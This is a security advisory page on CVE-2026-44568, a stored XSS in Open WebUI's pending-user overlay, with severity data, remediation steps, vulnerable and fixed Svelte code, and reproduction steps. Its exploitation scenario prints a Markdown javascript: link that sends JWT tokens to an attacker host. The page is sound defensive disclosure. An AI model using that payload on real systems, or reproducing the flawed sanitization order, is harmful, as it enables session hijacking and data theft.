AI Threat Alert

CVE-2026-44568: open-webui: XSS in pending overlay enables session hijack

GHSA-fq3v-xjjx-95rc MEDIUM CISA: TRACK*
Published May 8, 2026
CISO Take

CVE-2026-44568 is a stored XSS in Open WebUI's pending-user overlay where DOMPurify sanitization is applied to raw Markdown before parsing — not after — allowing Markdown link syntax with javascript: URIs to survive into rendered HTML entirely unsanitized. While exploitation requires admin credentials, in multi-admin deployments a single compromised admin account can silently harvest JWT tokens or serve fake login pages to every user held in pending status. No public exploit or CISA KEV listing exists (CVSS 4.8 medium), but the attack is trivially executable by any admin and leaves no obvious trace in server-side logs. Organizations running Open WebUI should upgrade to 0.9.0 immediately and audit the Pending User Overlay Content field for existing javascript: URIs or unexpected HTML.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

Medium severity with contextual elevation in multi-admin environments. CVSS 4.8 appropriately reflects the high-privilege prerequisite (PR:H), but actual attack complexity once admin access is obtained is near-zero — paste Markdown into a settings field. Open WebUI's track record of 52 prior CVEs and a package risk score of 38/100 signals a historically weak security posture. No public exploit or Nuclei scanner template exists, keeping near-term exploitation risk low for well-monitored deployments with restricted admin access.

How does the attack unfold?

Admin Account Compromise
Attacker gains admin-level access to Open WebUI through credential theft, password reuse, or social engineering of an existing admin principal.
AML.T0012
Payload Injection
Admin sets the Pending User Overlay Content field to a Markdown snippet containing a javascript: URI link, which bypasses DOMPurify due to incorrect pre-parse sanitization order.
AML.T0049
User Interaction Trigger
A pending user loads the overlay page and clicks the malicious link, triggering arbitrary JavaScript execution in their browser context.
AML.T0011.003
Session Hijack and Exfiltration
Executed script exfiltrates JWT tokens or credentials from browser storage, granting the attacker authenticated access to the AI platform as the victim user.
AML.T0091.000

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Open WebUI pip <= 0.8.12 0.9.0
142.4K Pushed 3d ago 77% patched ~5d to patch Full package profile →

Do you use Open WebUI? You're affected.

How severe is it?

CVSS 3.1
4.8 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 7% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR High
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps

  1. Upgrade to open-webui 0.9.0, which fixes the DOMPurify/marked.parse() ordering to sanitize after Markdown parsing.

  2. Immediately audit Admin Settings > General > Pending User Overlay Content for javascript: URIs, <script> tags, or unexpected HTML — clear the field if anything suspicious is found.

  3. If patching is delayed, restrict admin account access to the minimum necessary principals and enforce MFA on all admin accounts.

  4. Deploy a Content-Security-Policy header blocking javascript: URI execution as defense-in-depth.

  5. Review browser-side CSP violation reports or WAF logs for unexpected script execution patterns targeting the /pending overlay route.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Data Extraction Code Execution Social Engineering Inference Framework AML.T0011.003 AML.T0048.003 AML.T0049 AML.T0091.000

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.5 - AI system security testing
NIST AI RMF
MANAGE-2.4 - Risk treatments, including response to identified AI risks
OWASP LLM Top 10
LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-44568?

CVE-2026-44568 is a stored XSS in Open WebUI's pending-user overlay where DOMPurify sanitization is applied to raw Markdown before parsing — not after — allowing Markdown link syntax with javascript: URIs to survive into rendered HTML entirely unsanitized. While exploitation requires admin credentials, in multi-admin deployments a single compromised admin account can silently harvest JWT tokens or serve fake login pages to every user held in pending status. No public exploit or CISA KEV listing exists (CVSS 4.8 medium), but the attack is trivially executable by any admin and leaves no obvious trace in server-side logs. Organizations running Open WebUI should upgrade to 0.9.0 immediately and audit the Pending User Overlay Content field for existing javascript: URIs or unexpected HTML.

Is CVE-2026-44568 actively exploited?

No confirmed active exploitation of CVE-2026-44568 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44568?

1. Upgrade to open-webui 0.9.0, which fixes the DOMPurify/marked.parse() ordering to sanitize after Markdown parsing. 2. Immediately audit Admin Settings > General > Pending User Overlay Content for javascript: URIs, <script> tags, or unexpected HTML — clear the field if anything suspicious is found. 3. If patching is delayed, restrict admin account access to the minimum necessary principals and enforce MFA on all admin accounts. 4. Deploy a Content-Security-Policy header blocking javascript: URI execution as defense-in-depth. 5. Review browser-side CSP violation reports or WAF logs for unexpected script execution patterns targeting the /pending overlay route.

What systems are affected by CVE-2026-44568?

This vulnerability affects the following AI/ML architecture patterns: LLM serving frontends, AI chat interfaces, model serving.

What is the CVSS score for CVE-2026-44568?

CVE-2026-44568 has a CVSS v3.1 base score of 4.8 (MEDIUM). The EPSS exploitation probability is 0.17%.

What is the AI security impact?

Affected AI Architectures

LLM serving frontendsAI chat interfacesmodel serving

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application
AML.T0091.000 Application Access Token

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE-2.4
OWASP LLM Top 10: LLM02

What are the technical details?

Original Advisory

## Vulnerability Details **CWE-79**: Cross-site Scripting (XSS) The `AccountPending.svelte` component renders the admin-configured "Pending User Overlay Content" using `marked.parse()` inside `{@html}` with an incorrect DOMPurify application order: ### Vulnerable Code **`src/lib/components/layout/Overlay/AccountPending.svelte` (lines 43-48)**: ```svelte {@html marked.parse( DOMPurify.sanitize( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>') ) )} ``` DOMPurify is applied to the raw Markdown input **before** `marked.parse()` processes it. This is the wrong order. DOMPurify sanitizes the Markdown text (which contains no HTML tags), then `marked.parse()` converts Markdown link syntax into HTML `<a>` tags with `javascript:` href, and the result is rendered with `{@html}` unsanitized. The correct pattern (used elsewhere in the codebase, e.g., `NotebookView.svelte:77`) is: ```javascript DOMPurify.sanitize(marked.parse(src)) // sanitize AFTER markdown parsing ``` ## Steps to Reproduce ### Prerequisites - Open WebUI v0.8.10 - Admin account - A second user account with "pending" role ### Steps 1. Log in as admin and navigate to **Admin Settings** → **Settings** → **General**. 2. Set **Default User Role** to `pending`. 3. In the **Pending User Overlay Content** field, enter: ``` # Account Pending Your account is under review. [Contact Support](javascript:alert(document.domain)) ``` 4. Save the settings. 5. In a separate browser (or incognito window), create a new account or log in as a pending user. 6. The pending overlay is displayed. Click the "Contact Support" link. 7. A JavaScript alert dialog appears showing `localhost` (the document domain), confirming XSS execution. ### Verified Output The `alert(document.domain)` executes successfully, displaying "localhost" in a JavaScript dialog box. ## Impact An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This could be used to: - **Session hijacking**: Steal pending users' JWT tokens from cookies/localStorage - **Credential theft**: Replace the pending overlay with a fake login form - **Phishing**: Redirect pending users to malicious sites While this requires admin privileges to set the overlay content, it enables an admin to attack pending users (who have not yet been granted full access). In multi-admin deployments, a compromised admin account could use this to escalate attacks. ## Proposed Fix Apply DOMPurify **after** `marked.parse()`, not before: ```svelte <!-- Before (vulnerable): --> {@html marked.parse( DOMPurify.sanitize( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>') ) )} <!-- After (fixed): --> {@html DOMPurify.sanitize( marked.parse( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>'), { async: false } ) )} ``` <img width="1510" height="1093" alt="2026-03-23_03-07" src="https://github.com/user-attachments/assets/bcc94dd6-4f06-472b-9979-9759458c76b3" />

Exploitation Scenario

An attacker who has compromised an admin account in an organization running Open WebUI for internal LLM access navigates to Admin Settings > General and pastes a Markdown snippet — e.g., [Contact IT Help Desk](javascript:fetch('https://attacker.io/c?t='+localStorage.getItem('token'))) — into the Pending User Overlay Content field. Over the following days, every new employee whose account is held in pending status views the overlay, clicks the legitimate-looking help desk link, and unknowingly exfiltrates their JWT token to the attacker's server. The attacker replays those tokens to query the company's internal LLM deployment as legitimate users, extracting proprietary system prompts, RAG-indexed documents, and conversation history — all without triggering any server-side authentication alerts.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

References

Timeline

Published
May 8, 2026
Last Modified
May 8, 2026
First Seen
May 9, 2026

Related Vulnerabilities

CRITICAL CVE-2026-44551 9.1

open-webui: LDAP auth bypass — full account takeover

Same package: open-webui
HIGH CVE-2026-45672 8.8

open-webui: code exec gate bypass via API endpoint

Same package: open-webui
HIGH CVE-2026-44552 8.7

open-webui: Redis cache poisoning enables cross-instance tool hijack

Same package: open-webui
HIGH CVE-2025-64495 8.7

Open WebUI: XSS-to-RCE via malicious prompt injection

Same package: open-webui
HIGH CVE-2026-45315 8.7

open-webui: stored XSS → JWT theft and admin takeover

Same package: open-webui
Back to Threat Feed